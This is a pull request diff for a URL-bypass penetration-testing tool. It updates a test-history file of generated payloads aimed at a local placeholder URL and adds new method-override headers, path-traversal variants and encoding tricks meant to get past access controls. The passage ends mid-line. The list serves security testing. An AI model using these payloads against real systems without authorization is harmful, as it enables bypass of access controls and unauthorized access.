Closed laluka closed 10 months ago
diff --git a/tests-history/bup-payloads-2023-10-13.lst b/tests-history/bup-payloads-2024-01-23.lst index 1b5b511..16b9f12 100644 --- a/tests-history/bup-payloads-2023-10-13.lst +++ b/tests-history/bup-payloads-2024-01-23.lst @@ -1,5 +1,5 @@ -Bypasser has generated 3658 payloads for 'http://127.0.0.1:8000/foo/bar' url: +Bypasser has generated 3750 payloads for 'http://127.0.0.1:8000/foo/bar' url: [case_substitution] http://127.0.0.1:8000/Foo/bar [case_substitution] http://127.0.0.1:8000/fOo/bar [case_substitution] http://127.0.0.1:8000/foO/bar @@ -1839,6 +1839,7 @@ Bypasser has generated 3658 payloads for 'http://127.0.0.1:8000/foo/bar' url: [http_headers_ip] -H Z-Forwarded-For: null http://127.0.0.1:8000/foo/bar [http_headers_method] -H X-HTTP-Method-Override: ACL http://127.0.0.1:8000/foo/bar [http_headers_method] -H X-HTTP-Method-Override: BIND http://127.0.0.1:8000/foo/bar +[http_headers_method] -H X-HTTP-Method-Override: BPROPFIND http://127.0.0.1:8000/foo/bar [http_headers_method] -H X-HTTP-Method-Override: CHECKIN http://127.0.0.1:8000/foo/bar [http_headers_method] -H X-HTTP-Method-Override: CHECKOUT http://127.0.0.1:8000/foo/bar [http_headers_method] -H X-HTTP-Method-Override: CONNECT http://127.0.0.1:8000/foo/bar @@ -1874,6 +1875,7 @@ Bypasser has generated 3658 payloads for 'http://127.0.0.1:8000/foo/bar' url: [http_headers_method] -H X-HTTP-Method-Override: VERSION-CONTROL http://127.0.0.1:8000/foo/bar [http_headers_method] -H X-HTTP-Method: ACL http://127.0.0.1:8000/foo/bar [http_headers_method] -H X-HTTP-Method: BIND http://127.0.0.1:8000/foo/bar +[http_headers_method] -H X-HTTP-Method: BPROPFIND http://127.0.0.1:8000/foo/bar [http_headers_method] -H X-HTTP-Method: CHECKIN http://127.0.0.1:8000/foo/bar [http_headers_method] -H X-HTTP-Method: CHECKOUT http://127.0.0.1:8000/foo/bar [http_headers_method] -H X-HTTP-Method: CONNECT http://127.0.0.1:8000/foo/bar @@ -1909,6 +1911,7 @@ Bypasser has generated 3658 payloads for 'http://127.0.0.1:8000/foo/bar' url: [http_headers_method] -H X-HTTP-Method: VERSION-CONTROL http://127.0.0.1:8000/foo/bar [http_headers_method] -H X-Method-Override: ACL http://127.0.0.1:8000/foo/bar [http_headers_method] -H X-Method-Override: BIND http://127.0.0.1:8000/foo/bar +[http_headers_method] -H X-Method-Override: BPROPFIND http://127.0.0.1:8000/foo/bar [http_headers_method] -H X-Method-Override: CHECKIN http://127.0.0.1:8000/foo/bar [http_headers_method] -H X-Method-Override: CHECKOUT http://127.0.0.1:8000/foo/bar [http_headers_method] -H X-Method-Override: CONNECT http://127.0.0.1:8000/foo/bar @@ -2242,6 +2245,7 @@ Bypasser has generated 3658 payloads for 'http://127.0.0.1:8000/foo/bar' url: [http_headers_url] -H X-Wap-Profile: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/ [http_methods] -X ACL http://127.0.0.1:8000/foo/bar [http_methods] -X BIND http://127.0.0.1:8000/foo/bar +[http_methods] -X BPROPFIND http://127.0.0.1:8000/foo/bar [http_methods] -X CHECKIN http://127.0.0.1:8000/foo/bar [http_methods] -X CHECKOUT http://127.0.0.1:8000/foo/bar [http_methods] -X CONNECT http://127.0.0.1:8000/foo/bar @@ -2332,6 +2336,7 @@ Bypasser has generated 3658 payloads for 'http://127.0.0.1:8000/foo/bar' url: [mid_paths] http://127.0.0.1:8000/%3b%2f%2e%2efoo/bar [mid_paths] http://127.0.0.1:8000/%3b%2f%2e.foo/bar [mid_paths] http://127.0.0.1:8000/%3b%2f..foo/bar +[mid_paths] http://127.0.0.1:8000/%3b%2f。。foo/bar [mid_paths] http://127.0.0.1:8000/%3b/%2e%2e/..%2f%2ffoo/bar [mid_paths] http://127.0.0.1:8000/%3b/%2e.foo/bar [mid_paths] http://127.0.0.1:8000/%3b/%2f%2f../foo/bar @@ -2341,6 +2346,7 @@ Bypasser has generated 3658 payloads for 'http://127.0.0.1:8000/foo/bar' url: [mid_paths] http://127.0.0.1:8000/%3f%23foo/bar [mid_paths] http://127.0.0.1:8000/%3f%3ffoo/bar [mid_paths] http://127.0.0.1:8000/%3ffoo/bar +[mid_paths] http://127.0.0.1:8000/%FF%2E%FF%2Efoo/bar [mid_paths] http://127.0.0.1:8000/%c0%af%c0%af%c0%affoo/bar [mid_paths] http://127.0.0.1:8000/%c0%af%c0%af..foo/bar [mid_paths] http://127.0.0.1:8000/%c0%af%c0%affoo/bar @@ -2372,6 +2378,7 @@ Bypasser has generated 3658 payloads for 'http://127.0.0.1:8000/foo/bar' url: [mid_paths] http://127.0.0.1:8000/%ef%bc%8ffoo/bar [mid_paths] http://127.0.0.1:8000/%ef%bc%8fx%ef%bc%8f..;foo/bar [mid_paths] http://127.0.0.1:8000/%ef%bc%8fx%ef%bc%8f..foo/bar +[mid_paths] http://127.0.0.1:8000/%ef%bc%8fx%ef%bc%8f。。foo/bar [mid_paths] http://127.0.0.1:8000/%ef%bc%8fx;%ef%bc%8f..;foo/bar [mid_paths] http://127.0.0.1:8000/%ef%bc%8fx;%ef%bc%8f..foo/bar [mid_paths] http://127.0.0.1:8000/%foo/bar @@ -2382,6 +2389,10 @@ Bypasser has generated 3658 payloads for 'http://127.0.0.1:8000/foo/bar' url: [mid_paths] http://127.0.0.1:8000/.%00/foo/bar [mid_paths] http://127.0.0.1:8000/.%00foo/bar [mid_paths] http://127.0.0.1:8000/.%2e/foo/bar +[mid_paths] http://127.0.0.1:8000/.+./.+./foo/bar +[mid_paths] http://127.0.0.1:8000/.+./.+foo/bar +[mid_paths] http://127.0.0.1:8000/.+.;/.+.;/foo/bar +[mid_paths] http://127.0.0.1:8000/.+.foo/bar [mid_paths] http://127.0.0.1:8000/..%00/;foo/bar [mid_paths] http://127.0.0.1:8000/..%00/foo/bar [mid_paths] http://127.0.0.1:8000/..%00;/foo/bar @@ -2407,6 +2418,7 @@ Bypasser has generated 3658 payloads for 'http://127.0.0.1:8000/foo/bar' url: [mid_paths] http://127.0.0.1:8000/..;\\foo/bar [mid_paths] http://127.0.0.1:8000/..;\foo/bar [mid_paths] http://127.0.0.1:8000/..;foo/bar +[mid_paths] http://127.0.0.1:8000/..;foo=bar/foo/bar [mid_paths] http://127.0.0.1:8000/..\;foo/bar [mid_paths] http://127.0.0.1:8000/..\\foo/bar [mid_paths] http://127.0.0.1:8000/..\foo/bar @@ -2486,6 +2498,7 @@ Bypasser has generated 3658 payloads for 'http://127.0.0.1:8000/foo/bar' url: [mid_paths] http://127.0.0.1:8000//%3b%2f%2e%2efoo/bar [mid_paths] http://127.0.0.1:8000//%3b%2f%2e.foo/bar [mid_paths] http://127.0.0.1:8000//%3b%2f..foo/bar +[mid_paths] http://127.0.0.1:8000//%3b%2f。。foo/bar [mid_paths] http://127.0.0.1:8000//%3b/%2e%2e/..%2f%2ffoo/bar [mid_paths] http://127.0.0.1:8000//%3b/%2e.foo/bar [mid_paths] http://127.0.0.1:8000//%3b/%2f%2f../foo/bar @@ -2496,6 +2509,7 @@ Bypasser has generated 3658 payloads for 'http://127.0.0.1:8000/foo/bar' url: [mid_paths] http://127.0.0.1:8000//%3f%23foo/bar [mid_paths] http://127.0.0.1:8000//%3f%3ffoo/bar [mid_paths] http://127.0.0.1:8000//%3ffoo/bar +[mid_paths] http://127.0.0.1:8000//%FF%2E%FF%2Efoo/bar [mid_paths] http://127.0.0.1:8000//%c0%af%c0%af%c0%affoo/bar [mid_paths] http://127.0.0.1:8000//%c0%af%c0%af..foo/bar [mid_paths] http://127.0.0.1:8000//%c0%af%c0%affoo/bar @@ -2527,6 +2541,7 @@ Bypasser has generated 3658 payloads for 'http://127.0.0.1:8000/foo/bar' url: [mid_paths] http://127.0.0.1:8000//%ef%bc%8ffoo/bar [mid_paths] http://127.0.0.1:8000//%ef%bc%8fx%ef%bc%8f..;foo/bar [mid_paths] http://127.0.0.1:8000//%ef%bc%8fx%ef%bc%8f..foo/bar +[mid_paths] http://127.0.0.1:8000//%ef%bc%8fx%ef%bc%8f。。foo/bar [mid_paths] http://127.0.0.1:8000//%ef%bc%8fx;%ef%bc%8f..;foo/bar [mid_paths] http://127.0.0.1:8000//%ef%bc%8fx;%ef%bc%8f..foo/bar [mid_paths] http://127.0.0.1:8000//%foo/bar @@ -2540,6 +2555,10 @@ Bypasser has generated 3658 payloads for 'http://127.0.0.1:8000/foo/bar' url: [mid_paths] http://127.0.0.1:8000//.%00/foo/bar [mid_paths] http://127.0.0.1:8000//.%00foo/bar [mid_paths] http://127.0.0.1:8000//.%2e/foo/bar +[mid_paths] http://127.0.0.1:8000//.+./.+./foo/bar +[mid_paths] http://127.0.0.1:8000//.+./.+foo/bar +[mid_paths] http://127.0.0.1:8000//.+.;/.+.;/foo/bar +[mid_paths] http://127.0.0.1:8000//.+.foo/bar [mid_paths] http://127.0.0.1:8000//..%00/;foo/bar [mid_paths] http://127.0.0.1:8000//..%00/foo/bar [mid_paths] http://127.0.0.1:8000//..%00;/foo/bar @@ -2591,6 +2610,7 @@ Bypasser has generated 3658 payloads for 'http://127.0.0.1:8000/foo/bar' url: [mid_paths] http://127.0.0.1:8000//..;\\foo/bar [mid_paths] http://127.0.0.1:8000//..;\foo/bar [mid_paths] http://127.0.0.1:8000//..;foo/bar +[mid_paths] http://127.0.0.1:8000//..;foo=bar/foo/bar [mid_paths] http://127.0.0.1:8000//..\;foo/bar [mid_paths] http://127.0.0.1:8000//..\\foo/bar [mid_paths] http://127.0.0.1:8000//..\foo/bar @@ -2735,15 +2755,18 @@ Bypasser has generated 3658 payloads for 'http://127.0.0.1:8000/foo/bar' url: [mid_paths] http://127.0.0.1:8000///x//..;/foo/bar [mid_paths] http://127.0.0.1:8000///x/;/../foo/bar [mid_paths] http://127.0.0.1:8000///x/;/..;/foo/bar +[mid_paths] http://127.0.0.1:8000///x/。。;//foo/bar [mid_paths] http://127.0.0.1:8000///x;/%2e%2e/foo/bar [mid_paths] http://127.0.0.1:8000///x;/%2e%2efoo/bar [mid_paths] http://127.0.0.1:8000///x;/../foo/bar [mid_paths] http://127.0.0.1:8000///x;/..foo/bar +[mid_paths] http://127.0.0.1:8000///。。//foo/bar [mid_paths] http://127.0.0.1:8000//;%09..;foo/bar [mid_paths] http://127.0.0.1:8000//;%09..foo/bar [mid_paths] http://127.0.0.1:8000//;%09;foo/bar [mid_paths] http://127.0.0.1:8000//;%09foo/bar [mid_paths] http://127.0.0.1:8000//;%2F..foo/bar +[mid_paths] http://127.0.0.1:8000//;%2F。。foo/bar [mid_paths] http://127.0.0.1:8000//;%2f%2e%2e%2f%2e%2e%2f%2ffoo/bar [mid_paths] http://127.0.0.1:8000//;%2f%2e%2efoo/bar [mid_paths] http://127.0.0.1:8000//;%2f%2f/../foo/bar @@ -2771,10 +2794,12 @@ Bypasser has generated 3658 payloads for 'http://127.0.0.1:8000/foo/bar' url: [mid_paths] http://127.0.0.1:8000//;%2f//..%2ffoo/bar [mid_paths] http://127.0.0.1:8000//;%2f//../foo/bar [mid_paths] http://127.0.0.1:8000//;%2f//..;/foo/bar +[mid_paths] http://127.0.0.1:8000//;%2f//。。%2ffoo/bar [mid_paths] http://127.0.0.1:8000//;%2f/;/../foo/bar [mid_paths] http://127.0.0.1:8000//;%2f/;/..;/foo/bar [mid_paths] http://127.0.0.1:8000//;%2f;//../foo/bar [mid_paths] http://127.0.0.1:8000//;%2f;/;/..;/foo/bar +[mid_paths] http://127.0.0.1:8000//;%2f。。foo/bar [mid_paths] http://127.0.0.1:8000//;/$2e%2e%2f..%2ffoo/bar [mid_paths] http://127.0.0.1:8000//;/%2e%2e%2f%2e%2e%2ffoo/bar [mid_paths] http://127.0.0.1:8000//;/%2e%2e%2f%2ffoo/bar @@ -2818,8 +2843,12 @@ Bypasser has generated 3658 payloads for 'http://127.0.0.1:8000/foo/bar' url: [mid_paths] http://127.0.0.1:8000//;///foo/bar [mid_paths] http://127.0.0.1:8000//;//foo/bar [mid_paths] http://127.0.0.1:8000//;/foo/bar +[mid_paths] http://127.0.0.1:8000//;/。。%2f/foo/bar +[mid_paths] http://127.0.0.1:8000//;/。。/foo/bar +[mid_paths] http://127.0.0.1:8000//;/。。foo/bar [mid_paths] http://127.0.0.1:8000//;?foo/bar [mid_paths] http://127.0.0.1:8000//;foo/bar +[mid_paths] http://127.0.0.1:8000//;foo=bar/foo/bar [mid_paths] http://127.0.0.1:8000//;x/foo/bar [mid_paths] http://127.0.0.1:8000//;x;foo/bar [mid_paths] http://127.0.0.1:8000//;xfoo/bar @@ -2829,6 +2858,7 @@ Bypasser has generated 3658 payloads for 'http://127.0.0.1:8000/foo/bar' url: [mid_paths] http://127.0.0.1:8000//??foo/bar [mid_paths] http://127.0.0.1:8000//?foo/bar [mid_paths] http://127.0.0.1:8000//\..\.\foo/bar +[mid_paths] http://127.0.0.1:8000//\xFF\x2E\xFF\x2Efoo/bar [mid_paths] http://127.0.0.1:8000//foo/#?bar [mid_paths] http://127.0.0.1:8000//foo/#bar [mid_paths] http://127.0.0.1:8000//foo/%09%3bbar @@ -2881,6 +2911,7 @@ Bypasser has generated 3658 payloads for 'http://127.0.0.1:8000/foo/bar' url: [mid_paths] http://127.0.0.1:8000//foo/%3b%2f%2e%2ebar [mid_paths] http://127.0.0.1:8000//foo/%3b%2f%2e.bar [mid_paths] http://127.0.0.1:8000//foo/%3b%2f..bar +[mid_paths] http://127.0.0.1:8000//foo/%3b%2f。。bar [mid_paths] http://127.0.0.1:8000//foo/%3b/%2e%2e/..%2f%2fbar [mid_paths] http://127.0.0.1:8000//foo/%3b/%2e.bar [mid_paths] http://127.0.0.1:8000//foo/%3b/%2f%2f../bar @@ -2890,6 +2921,7 @@ Bypasser has generated 3658 payloads for 'http://127.0.0.1:8000/foo/bar' url: [mid_paths] http://127.0.0.1:8000//foo/%3f%23bar [mid_paths] http://127.0.0.1:8000//foo/%3f%3fbar [mid_paths] http://127.0.0.1:8000//foo/%3fbar +[mid_paths] http://127.0.0.1:8000//foo/%FF%2E%FF%2Ebar [mid_paths] http://127.0.0.1:8000//foo/%bar [mid_paths] http://127.0.0.1:8000//foo/%c0%af%c0%af%c0%afbar [mid_paths] http://127.0.0.1:8000//foo/%c0%af%c0%af..bar @@ -2922,6 +2954,7 @@ Bypasser has generated 3658 payloads for 'http://127.0.0.1:8000/foo/bar' url: [mid_paths] http://127.0.0.1:8000//foo/%ef%bc%8fbar [mid_paths] http://127.0.0.1:8000//foo/%ef%bc%8fx%ef%bc%8f..;bar [mid_paths] http://127.0.0.1:8000//foo/%ef%bc%8fx%ef%bc%8f..bar +[mid_paths] http://127.0.0.1:8000//foo/%ef%bc%8fx%ef%bc%8f。。bar [mid_paths] http://127.0.0.1:8000//foo/%ef%bc%8fx;%ef%bc%8f..;bar [mid_paths] http://127.0.0.1:8000//foo/%ef%bc%8fx;%ef%bc%8f..bar [mid_paths] http://127.0.0.1:8000//foo/%u002e/%u002ebar @@ -2931,6 +2964,10 @@ Bypasser has generated 3658 payloads for 'http://127.0.0.1:8000/foo/bar' url: [mid_paths] http://127.0.0.1:8000//foo/.%00/bar [mid_paths] http://127.0.0.1:8000//foo/.%00bar [mid_paths] http://127.0.0.1:8000//foo/.%2e/bar +[mid_paths] http://127.0.0.1:8000//foo/.+./.+./bar +[mid_paths] http://127.0.0.1:8000//foo/.+./.+bar +[mid_paths] http://127.0.0.1:8000//foo/.+.;/.+.;/bar +[mid_paths] http://127.0.0.1:8000//foo/.+.bar [mid_paths] http://127.0.0.1:8000//foo/..%00/;bar [mid_paths] http://127.0.0.1:8000//foo/..%00/bar [mid_paths] http://127.0.0.1:8000//foo/..%00;/bar @@ -2956,6 +2993,7 @@ Bypasser has generated 3658 payloads for 'http://127.0.0.1:8000/foo/bar' url: [mid_paths] http://127.0.0.1:8000//foo/..;\\bar [mid_paths] http://127.0.0.1:8000//foo/..;\bar [mid_paths] http://127.0.0.1:8000//foo/..;bar +[mid_paths] http://127.0.0.1:8000//foo/..;foo=bar/bar [mid_paths] http://127.0.0.1:8000//foo/..\;bar [mid_paths] http://127.0.0.1:8000//foo/..\\bar [mid_paths] http://127.0.0.1:8000//foo/..\bar @@ -3092,15 +3130,18 @@ Bypasser has generated 3658 payloads for 'http://127.0.0.1:8000/foo/bar' url: [mid_paths] http://127.0.0.1:8000//foo//x//..;/bar [mid_paths] http://127.0.0.1:8000//foo//x/;/../bar [mid_paths] http://127.0.0.1:8000//foo//x/;/..;/bar +[mid_paths] http://127.0.0.1:8000//foo//x/。。;//bar [mid_paths] http://127.0.0.1:8000//foo//x;/%2e%2e/bar [mid_paths] http://127.0.0.1:8000//foo//x;/%2e%2ebar [mid_paths] http://127.0.0.1:8000//foo//x;/../bar [mid_paths] http://127.0.0.1:8000//foo//x;/..bar +[mid_paths] http://127.0.0.1:8000//foo//。。//bar [mid_paths] http://127.0.0.1:8000//foo/;%09..;bar [mid_paths] http://127.0.0.1:8000//foo/;%09..bar [mid_paths] http://127.0.0.1:8000//foo/;%09;bar [mid_paths] http://127.0.0.1:8000//foo/;%09bar [mid_paths] http://127.0.0.1:8000//foo/;%2F..bar +[mid_paths] http://127.0.0.1:8000//foo/;%2F。。bar [mid_paths] http://127.0.0.1:8000//foo/;%2f%2e%2e%2f%2e%2e%2f%2fbar [mid_paths] http://127.0.0.1:8000//foo/;%2f%2e%2ebar [mid_paths] http://127.0.0.1:8000//foo/;%2f%2f/../bar @@ -3128,10 +3169,12 @@ Bypasser has generated 3658 payloads for 'http://127.0.0.1:8000/foo/bar' url: [mid_paths] http://127.0.0.1:8000//foo/;%2f//..%2fbar [mid_paths] http://127.0.0.1:8000//foo/;%2f//../bar [mid_paths] http://127.0.0.1:8000//foo/;%2f//..;/bar +[mid_paths] http://127.0.0.1:8000//foo/;%2f//。。%2fbar [mid_paths] http://127.0.0.1:8000//foo/;%2f/;/../bar [mid_paths] http://127.0.0.1:8000//foo/;%2f/;/..;/bar [mid_paths] http://127.0.0.1:8000//foo/;%2f;//../bar [mid_paths] http://127.0.0.1:8000//foo/;%2f;/;/..;/bar +[mid_paths] http://127.0.0.1:8000//foo/;%2f。。bar [mid_paths] http://127.0.0.1:8000//foo/;/$2e%2e%2f..%2fbar [mid_paths] http://127.0.0.1:8000//foo/;/%2e%2e%2f%2e%2e%2fbar [mid_paths] http://127.0.0.1:8000//foo/;/%2e%2e%2f%2fbar @@ -3174,8 +3217,12 @@ Bypasser has generated 3658 payloads for 'http://127.0.0.1:8000/foo/bar' url: [mid_paths] http://127.0.0.1:8000//foo/;///..bar [mid_paths] http://127.0.0.1:8000//foo/;//bar [mid_paths] http://127.0.0.1:8000//foo/;/bar +[mid_paths] http://127.0.0.1:8000//foo/;/。。%2f/bar +[mid_paths] http://127.0.0.1:8000//foo/;/。。/bar +[mid_paths] http://127.0.0.1:8000//foo/;/。。bar [mid_paths] http://127.0.0.1:8000//foo/;?bar [mid_paths] http://127.0.0.1:8000//foo/;bar +[mid_paths] http://127.0.0.1:8000//foo/;foo=bar/bar [mid_paths] http://127.0.0.1:8000//foo/;x/bar [mid_paths] http://127.0.0.1:8000//foo/;x;bar [mid_paths] http://127.0.0.1:8000//foo/;xbar @@ -3185,11 +3232,16 @@ Bypasser has generated 3658 payloads for 'http://127.0.0.1:8000/foo/bar' url: [mid_paths] http://127.0.0.1:8000//foo/??bar [mid_paths] http://127.0.0.1:8000//foo/?bar [mid_paths] http://127.0.0.1:8000//foo/\..\.\bar +[mid_paths] http://127.0.0.1:8000//foo/\xFF\x2E\xFF\x2Ebar [mid_paths] http://127.0.0.1:8000//foo/bar [mid_paths] http://127.0.0.1:8000//foo/x;/%2e%2e/bar [mid_paths] http://127.0.0.1:8000//foo/x;/%2e%2ebar [mid_paths] http://127.0.0.1:8000//foo/x;/../bar [mid_paths] http://127.0.0.1:8000//foo/x;/..bar +[mid_paths] http://127.0.0.1:8000//foo/x;/。。bar +[mid_paths] http://127.0.0.1:8000//foo/。。%5cbar +[mid_paths] http://127.0.0.1:8000//foo/。。;bar +[mid_paths] http://127.0.0.1:8000//foo/�.�.bar [mid_paths] http://127.0.0.1:8000//x/..//foo/bar [mid_paths] http://127.0.0.1:8000//x/../;/foo/bar [mid_paths] http://127.0.0.1:8000//x/../foo/bar @@ -3200,15 +3252,22 @@ Bypasser has generated 3658 payloads for 'http://127.0.0.1:8000/foo/bar' url: [mid_paths] http://127.0.0.1:8000//x//..;/foo/bar [mid_paths] http://127.0.0.1:8000//x/;/../foo/bar [mid_paths] http://127.0.0.1:8000//x/;/..;/foo/bar +[mid_paths] http://127.0.0.1:8000//x/。。;//foo/bar [mid_paths] http://127.0.0.1:8000//x;/%2e%2e/foo/bar [mid_paths] http://127.0.0.1:8000//x;/%2e%2efoo/bar [mid_paths] http://127.0.0.1:8000//x;/../foo/bar [mid_paths] http://127.0.0.1:8000//x;/..foo/bar +[mid_paths] http://127.0.0.1:8000//x;/。。foo/bar +[mid_paths] http://127.0.0.1:8000//。。%5cfoo/bar +[mid_paths] http://127.0.0.1:8000//。。//foo/bar +[mid_paths] http://127.0.0.1:8000//。。;foo/bar +[mid_paths] http://127.0.0.1:8000//�.�.foo/bar [mid_paths] http://127.0.0.1:8000/;%09..;foo/bar [mid_paths] http://127.0.0.1:8000/;%09..foo/bar [mid_paths] http://127.0.0.1:8000/;%09;foo/bar [mid_paths] http://127.0.0.1:8000/;%09foo/bar [mid_paths] http://127.0.0.1:8000/;%2F..foo/bar +[mid_paths] http://127.0.0.1:8000/;%2F。。foo/bar [mid_paths] http://127.0.0.1:8000/;%2f%2e%2e%2f%2e%2e%2f%2ffoo/bar [mid_paths] http://127.0.0.1:8000/;%2f%2e%2efoo/bar [mid_paths] http://127.0.0.1:8000/;%2f%2f/../foo/bar @@ -3236,10 +3295,12 @@ Bypasser has generated 3658 payloads for 'http://127.0.0.1:8000/foo/bar' url: [mid_paths] http://127.0.0.1:8000/;%2f//..%2ffoo/bar [mid_paths] http://127.0.0.1:8000/;%2f//../foo/bar [mid_paths] http://127.0.0.1:8000/;%2f//..;/foo/bar +[mid_paths] http://127.0.0.1:8000/;%2f//。。%2ffoo/bar [mid_paths] http://127.0.0.1:8000/;%2f/;/../foo/bar [mid_paths] http://127.0.0.1:8000/;%2f/;/..;/foo/bar [mid_paths] http://127.0.0.1:8000/;%2f;//../foo/bar [mid_paths] http://127.0.0.1:8000/;%2f;/;/..;/foo/bar +[mid_paths] http://127.0.0.1:8000/;%2f。。foo/bar [mid_paths] http://127.0.0.1:8000/;/$2e%2e%2f..%2ffoo/bar [mid_paths] http://127.0.0.1:8000/;/%2e%2e%2f%2e%2e%2ffoo/bar [mid_paths] http://127.0.0.1:8000/;/%2e%2e%2f%2ffoo/bar @@ -3282,8 +3343,12 @@ Bypasser has generated 3658 payloads for 'http://127.0.0.1:8000/foo/bar' url: [mid_paths] http://127.0.0.1:8000/;///..foo/bar [mid_paths] http://127.0.0.1:8000/;//foo/bar [mid_paths] http://127.0.0.1:8000/;/foo/bar +[mid_paths] http://127.0.0.1:8000/;/。。%2f/foo/bar +[mid_paths] http://127.0.0.1:8000/;/。。/foo/bar +[mid_paths] http://127.0.0.1:8000/;/。。foo/bar [mid_paths] http://127.0.0.1:8000/;?foo/bar [mid_paths] http://127.0.0.1:8000/;foo/bar +[mid_paths] http://127.0.0.1:8000/;foo=bar/foo/bar [mid_paths] http://127.0.0.1:8000/;x/foo/bar [mid_paths] http://127.0.0.1:8000/;x;foo/bar [mid_paths] http://127.0.0.1:8000/;xfoo/bar @@ -3293,6 +3358,7 @@ Bypasser has generated 3658 payloads for 'http://127.0.0.1:8000/foo/bar' url: [mid_paths] http://127.0.0.1:8000/??foo/bar [mid_paths] http://127.0.0.1:8000/?foo/bar [mid_paths] http://127.0.0.1:8000/\..\.\foo/bar +[mid_paths] http://127.0.0.1:8000/\xFF\x2E\xFF\x2Efoo/bar [mid_paths] http://127.0.0.1:8000/foo/#?bar [mid_paths] http://127.0.0.1:8000/foo/#bar [mid_paths] http://127.0.0.1:8000/foo/%09%3bbar @@ -3345,6 +3411,7 @@ Bypasser has generated 3658 payloads for 'http://127.0.0.1:8000/foo/bar' url: [mid_paths] http://127.0.0.1:8000/foo/%3b%2f%2e%2ebar [mid_paths] http://127.0.0.1:8000/foo/%3b%2f%2e.bar [mid_paths] http://127.0.0.1:8000/foo/%3b%2f..bar +[mid_paths] http://127.0.0.1:8000/foo/%3b%2f。。bar [mid_paths] http://127.0.0.1:8000/foo/%3b/%2e%2e/..%2f%2fbar [mid_paths] http://127.0.0.1:8000/foo/%3b/%2e.bar [mid_paths] http://127.0.0.1:8000/foo/%3b/%2f%2f../bar @@ -3354,6 +3421,7 @@ Bypasser has generated 3658 payloads for 'http://127.0.0.1:8000/foo/bar' url: [mid_paths] http://127.0.0.1:8000/foo/%3f%23bar [mid_paths] http://127.0.0.1:8000/foo/%3f%3fbar [mid_paths] http://127.0.0.1:8000/foo/%3fbar +[mid_paths] http://127.0.0.1:8000/foo/%FF%2E%FF%2Ebar [mid_paths] http://127.0.0.1:8000/foo/%bar [mid_paths] http://127.0.0.1:8000/foo/%c0%af%c0%af%c0%afbar [mid_paths] http://127.0.0.1:8000/foo/%c0%af%c0%af..bar @@ -3386,6 +3454,7 @@ Bypasser has generated 3658 payloads for 'http://127.0.0.1:8000/foo/bar' url: [mid_paths] http://127.0.0.1:8000/foo/%ef%bc%8fbar [mid_paths] http://127.0.0.1:8000/foo/%ef%bc%8fx%ef%bc%8f..;bar [mid_paths] http://127.0.0.1:8000/foo/%ef%bc%8fx%ef%bc%8f..bar +[mid_paths] http://127.0.0.1:8000/foo/%ef%bc%8fx%ef%bc%8f。。bar [mid_paths] http://127.0.0.1:8000/foo/%ef%bc%8fx;%ef%bc%8f..;bar [mid_paths] http://127.0.0.1:8000/foo/%ef%bc%8fx;%ef%bc%8f..bar [mid_paths] http://127.0.0.1:8000/foo/%u002e/%u002ebar @@ -3395,6 +3464,10 @@ Bypasser has generated 3658 payloads for 'http://127.0.0.1:8000/foo/bar' url: [mid_paths] http://127.0.0.1:8000/foo/.%00/bar [mid_paths] http://127.0.0.1:8000/foo/.%00bar [mid_paths] http://127.0.0.1:8000/foo/.%2e/bar +[mid_paths] http://127.0.0.1:8000/foo/.+./.+./bar +[mid_paths] http://127.0.0.1:8000/foo/.+./.+bar +[mid_paths] http://127.0.0.1:8000/foo/.+.;/.+.;/bar +[mid_paths] http://127.0.0.1:8000/foo/.+.bar [mid_paths] http://127.0.0.1:8000/foo/..%00/;bar [mid_paths] http://127.0.0.1:8000/foo/..%00/bar [mid_paths] http://127.0.0.1:8000/foo/..%00;/bar @@ -3420,6 +3493,7 @@ Bypasser has generated 3658 payloads for 'http://127.0.0.1:8000/foo/bar' url: [mid_paths] http://127.0.0.1:8000/foo/..;\\bar [mid_paths] http://127.0.0.1:8000/foo/..;\bar [mid_paths] http://127.0.0.1:8000/foo/..;bar +[mid_paths] http://127.0.0.1:8000/foo/..;foo=bar/bar [mid_paths] http://127.0.0.1:8000/foo/..\;bar [mid_paths] http://127.0.0.1:8000/foo/..\\bar [mid_paths] http://127.0.0.1:8000/foo/..\bar @@ -3556,15 +3630,18 @@ Bypasser has generated 3658 payloads for 'http://127.0.0.1:8000/foo/bar' url: [mid_paths] http://127.0.0.1:8000/foo//x//..;/bar [mid_paths] http://127.0.0.1:8000/foo//x/;/../bar [mid_paths] http://127.0.0.1:8000/foo//x/;/..;/bar +[mid_paths] http://127.0.0.1:8000/foo//x/。。;//bar [mid_paths] http://127.0.0.1:8000/foo//x;/%2e%2e/bar [mid_paths] http://127.0.0.1:8000/foo//x;/%2e%2ebar [mid_paths] http://127.0.0.1:8000/foo//x;/../bar [mid_paths] http://127.0.0.1:8000/foo//x;/..bar +[mid_paths] http://127.0.0.1:8000/foo//。。//bar [mid_paths] http://127.0.0.1:8000/foo/;%09..;bar [mid_paths] http://127.0.0.1:8000/foo/;%09..bar [mid_paths] http://127.0.0.1:8000/foo/;%09;bar [mid_paths] http://127.0.0.1:8000/foo/;%09bar [mid_paths] http://127.0.0.1:8000/foo/;%2F..bar +[mid_paths] http://127.0.0.1:8000/foo/;%2F。。bar [mid_paths] http://127.0.0.1:8000/foo/;%2f%2e%2e%2f%2e%2e%2f%2fbar [mid_paths] http://127.0.0.1:8000/foo/;%2f%2e%2ebar [mid_paths] http://127.0.0.1:8000/foo/;%2f%2f/../bar @@ -3592,10 +3669,12 @@ Bypasser has generated 3658 payloads for 'http://127.0.0.1:8000/foo/bar' url: [mid_paths] http://127.0.0.1:8000/foo/;%2f//..%2fbar [mid_paths] http://127.0.0.1:8000/foo/;%2f//../bar [mid_paths] http://127.0.0.1:8000/foo/;%2f//..;/bar +[mid_paths] http://127.0.0.1:8000/foo/;%2f//。。%2fbar [mid_paths] http://127.0.0.1:8000/foo/;%2f/;/../bar [mid_paths] http://127.0.0.1:8000/foo/;%2f/;/..;/bar [mid_paths] http://127.0.0.1:8000/foo/;%2f;//../bar [mid_paths] http://127.0.0.1:8000/foo/;%2f;/;/..;/bar +[mid_paths] http://127.0.0.1:8000/foo/;%2f。。bar [mid_paths] http://127.0.0.1:8000/foo/;/$2e%2e%2f..%2fbar [mid_paths] http://127.0.0.1:8000/foo/;/%2e%2e%2f%2e%2e%2fbar [mid_paths] http://127.0.0.1:8000/foo/;/%2e%2e%2f%2fbar @@ -3638,8 +3717,12 @@ Bypasser has generated 3658 payloads for 'http://127.0.0.1:8000/foo/bar' url: [mid_paths] http://127.0.0.1:8000/foo/;///..bar [mid_paths] http://127.0.0.1:8000/foo/;//bar [mid_paths] 